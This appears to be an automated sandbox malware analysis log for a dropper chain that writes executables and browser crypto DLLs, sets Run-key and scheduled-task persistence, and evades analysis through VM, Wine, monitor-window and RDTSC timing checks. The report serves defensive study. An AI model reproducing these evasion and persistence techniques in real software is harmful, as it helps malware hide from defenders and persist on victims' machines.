Source: random[1].exe.7.dr Static PE information: section name: .casiwid
Source: random[1].exe.7.dr Static PE information: section name: .mufu
Source: 8ec8c5c339.exe.7.dr Static PE information: section name: .casiwid
Source: 8ec8c5c339.exe.7.dr Static PE information: section name: .mufu
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: random[1].exe0.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: 1c593ec106.exe.7.dr Static PE information: section name:
Source: freebl3.dll.8.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.8.dr Static PE information: section name: .00cfg
Source: mozglue.dll.8.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.8.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.8.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.8.dr Static PE information: section name: .didat
Source: nss3.dll.8.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.8.dr Static PE information: section name: .00cfg
Source: softokn3.dll.8.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.8.dr Static PE information: section name: .00cfg
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: .idata
Source: random[1].exe.8.dr Static PE information: section name:
Source: random[1].exe.8.dr Static PE information: section name: lybfcffv
Source: random[1].exe.8.dr Static PE information: section name: emchirzz
Source: random[1].exe.8.dr Static PE information: section name: .taggant
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: .idata
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name:
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: lybfcffv
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: emchirzz
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: .taggant
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: .idata
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name:
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: finyobjn
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: cveoqpqu
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: .taggant
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: .idata
Source: random[1].exe0.8.dr Static PE information: section name:
Source: random[1].exe0.8.dr Static PE information: section name: finyobjn
Source: random[1].exe0.8.dr Static PE information: section name: cveoqpqu
Source: random[1].exe0.8.dr Static PE information: section name: .taggant
Source: axplong.exe.18.dr Static PE information: section name:
Source: axplong.exe.18.dr Static PE information: section name: .idata
Source: axplong.exe.18.dr Static PE information: section name:
Source: axplong.exe.18.dr Static PE information: section name: finyobjn
Source: axplong.exe.18.dr Static PE information: section name: cveoqpqu
Source: axplong.exe.18.dr Static PE information: section name: .taggant
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Code function: 7_2_0032D84C push ecx; ret 7_2_0032D85F
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_0041A9F5 push ecx; ret 8_2_0041AA08
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_6C1FB536 push ecx; ret 8_2_6C1FB549
Source: 8NjcvPNvUr.exe Static PE information: section name: entropy: 7.987936779363103
Source: 8NjcvPNvUr.exe Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: explorti.exe.0.dr Static PE information: section name: entropy: 7.987936779363103
Source: explorti.exe.0.dr Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: random[1].exe.7.dr Static PE information: section name: .text entropy: 7.812950396957531
Source: 8ec8c5c339.exe.7.dr Static PE information: section name: .text entropy: 7.812950396957531
Source: random[1].exe0.7.dr Static PE information: section name: entropy: 7.999400097848481
Source: random[1].exe0.7.dr Static PE information: section name: entropy: 7.99076230675352
Source: random[1].exe0.7.dr Static PE information: section name: entropy: 7.999175266136623
Source: random[1].exe0.7.dr Static PE information: section name: entropy: 7.964571388660085
Source: 1c593ec106.exe.7.dr Static PE information: section name: entropy: 7.999400097848481
Source: 1c593ec106.exe.7.dr Static PE information: section name: entropy: 7.99076230675352
Source: 1c593ec106.exe.7.dr Static PE information: section name: entropy: 7.999175266136623
Source: 1c593ec106.exe.7.dr Static PE information: section name: entropy: 7.964571388660085
Source: random[1].exe.8.dr Static PE information: section name: entropy: 7.987936779363103
Source: random[1].exe.8.dr Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: entropy: 7.987936779363103
Source: RoamingHJDBKJKFIE.exe.8.dr Static PE information: section name: lybfcffv entropy: 7.954168133889622
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: entropy: 7.983363124481756
Source: userKFHCAEGCBF.exe.8.dr Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: random[1].exe0.8.dr Static PE information: section name: entropy: 7.983363124481756
Source: random[1].exe0.8.dr Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: axplong.exe.18.dr Static PE information: section name: entropy: 7.983363124481756
Source: axplong.exe.18.dr Static PE information: section name: finyobjn entropy: 7.954291882741596
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\mozglue.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\nss3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\msvcp140.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\nss3[1].dll
Source: C:\Users\userKFHCAEGCBF.exe File created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\freebl3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File created: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\userKFHCAEGCBF.exe
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\ProgramData\softokn3.dll
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe

Boot Survival

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 1c593ec106.exe
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 8ec8c5c339.exe
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe Window searched: window name: RegmonClass
Source: C:\Users\userKFHCAEGCBF.exe Window searched: window name: FilemonClass
Source: C:\Users\userKFHCAEGCBF.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\userKFHCAEGCBF.exe Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File created: C:\Windows\Tasks\explorti.job
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Code function: 8_2_004195E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 8_2_004195E0
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Temp\1000017001\1c593ec106.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\userKFHCAEGCBF.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\AppData\Local\Temp\1000016001\8ec8c5c339.exe Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_CURRENT_USER\Software\Wine Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Jump to behavior
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\RoamingHJDBKJKFIE.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\userKFHCAEGCBF.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\userKFHCAEGCBF.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443940 second address: 443944 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443A9C second address: 443AA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443AA2 second address: 443AA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443AA8 second address: 443ACB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD1807ED556h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443ACB second address: 443AD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443F03 second address: 443F07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443F07 second address: 443F10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443F10 second address: 443F43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD1807ED552h 0x00000009 jnl 00007FD1807ED546h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD1807ED552h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 443F43 second address: 443F54 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jnp 00007FD180B5C156h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 44651C second address: 44658B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD1807ED54Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov si, dx 0x0000000f push 00000000h 0x00000011 and ch, 0000003Bh 0x00000014 push 943A65A8h 0x00000019 pushad 0x0000001a push ebx 0x0000001b jl 00007FD1807ED546h 0x00000021 pop ebx 0x00000022 push edx 0x00000023 jmp 00007FD1807ED554h 0x00000028 pop edx 0x00000029 popad 0x0000002a add dword ptr [esp], 6BC59AD8h 0x00000031 sub esi, 5594CB6Dh 0x00000037 push 00000003h 0x00000039 add dh, 0000000Dh 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D2CC3h] 0x00000044 push 00000003h 0x00000046 pushad 0x00000047 cmc 0x00000048 mov ebx, dword ptr [ebp+122D2997h] 0x0000004e popad 0x0000004f push 499A4006h 0x00000054 push eax 0x00000055 push edx 0x00000056 push edx 0x00000057 pushad 0x00000058 popad 0x00000059 pop edx 0x0000005a rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 44670F second address: 446713 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446713 second address: 446736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007FD1807ED559h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446736 second address: 446759 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD180B5C166h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446759 second address: 44675D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 44675D second address: 446761 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446761 second address: 4467B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007FD1807ED553h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jmp 00007FD1807ED552h 0x00000017 pop eax 0x00000018 mov edx, dword ptr [ebp+122D2C93h] 0x0000001e lea ebx, dword ptr [ebp+1245B3C8h] 0x00000024 jg 00007FD1807ED54Ch 0x0000002a push eax 0x0000002b push ebx 0x0000002c jnc 00007FD1807ED54Ch 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446826 second address: 4468AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jo 00007FD180B5C167h 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 jmp 00007FD180B5C15Dh 0x00000016 popad 0x00000017 nop 0x00000018 pushad 0x00000019 call 00007FD180B5C15Fh 0x0000001e mov ecx, dword ptr [ebp+122D2A17h] 0x00000024 pop edi 0x00000025 mov esi, eax 0x00000027 popad 0x00000028 push 00000000h 0x0000002a mov ecx, eax 0x0000002c mov edx, dword ptr [ebp+122D2C5Fh] 0x00000032 call 00007FD180B5C159h 0x00000037 jmp 00007FD180B5C15Dh 0x0000003c push eax 0x0000003d jmp 00007FD180B5C15Eh 0x00000042 mov eax, dword ptr [esp+04h] 0x00000046 jmp 00007FD180B5C160h 0x0000004b mov eax, dword ptr [eax] 0x0000004d push eax 0x0000004e push edx 0x0000004f jnc 00007FD180B5C158h 0x00000055 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4468AF second address: 4468BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FD1807ED546h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 4468BA second address: 44694D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b jno 00007FD180B5C160h 0x00000011 pop eax 0x00000012 push 00000000h 0x00000014 push ebx 0x00000015 call 00007FD180B5C158h 0x0000001a pop ebx 0x0000001b mov dword ptr [esp+04h], ebx 0x0000001f add dword ptr [esp+04h], 00000017h 0x00000027 inc ebx 0x00000028 push ebx 0x00000029 ret 0x0000002a pop ebx 0x0000002b ret 0x0000002c push 00000003h 0x0000002e push 00000000h 0x00000030 push ebx 0x00000031 call 00007FD180B5C158h 0x00000036 pop ebx 0x00000037 mov dword ptr [esp+04h], ebx 0x0000003b add dword ptr [esp+04h], 00000014h 0x00000043 inc ebx 0x00000044 push ebx 0x00000045 ret 0x00000046 pop ebx 0x00000047 ret 0x00000048 pushad 0x00000049 mov edi, dword ptr [ebp+122D33EDh] 0x0000004f or dword ptr [ebp+122D3543h], edi 0x00000055 popad 0x00000056 mov ecx, dword ptr [ebp+122D2CCFh] 0x0000005c push 00000000h 0x0000005e or ecx, dword ptr [ebp+122D322Ch] 0x00000064 push 00000003h 0x00000066 jmp 00007FD180B5C161h 0x0000006b push B5C169CDh 0x00000070 push eax 0x00000071 push edx 0x00000072 push ecx 0x00000073 push ebx 0x00000074 pop ebx 0x00000075 pop ecx 0x00000076 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 44694D second address: 446953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8NjcvPNvUr.exe RDTSC instruction interceptor: First address: 446953 second address: 446957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
